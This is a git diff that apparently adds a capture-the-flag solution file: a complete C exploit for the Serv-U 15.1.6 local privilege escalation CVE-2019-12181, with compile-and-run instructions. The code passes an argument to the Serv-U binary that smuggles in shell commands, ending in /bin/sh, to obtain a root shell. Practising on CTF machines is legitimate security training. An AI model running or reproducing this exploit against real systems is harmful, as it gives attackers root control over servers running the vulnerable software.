initial commit

CTF/Anonforce/exploit.c

@@ -0,0 +1,24 @@
+/*
+
+CVE-2019-12181 Serv-U 15.1.6 Privilege Escalation
+
+vulnerability found by:
+Guy Levin (@va_start - twitter.com/va_start) https://blog.vastart.dev
+
+to compile and run:
+gcc servu-pe-cve-2019-12181.c -o pe && ./pe
+
+*/
+
+#include <stdio.h>
+#include <unistd.h>
+#include <errno.h>
+
+int main()
+{
+    char *vuln_args[] = {"\" ; id; echo 'opening root shell' ; /bin/sh; \"", "-prepareinstallation", NULL};
+    int ret_val = execv("/usr/local/Serv-U/Serv-U", vuln_args);
+    // if execv is successful, we won't reach here
+    printf("ret val: %d errno: %d\n", ret_val, errno);
+    return errno;
+}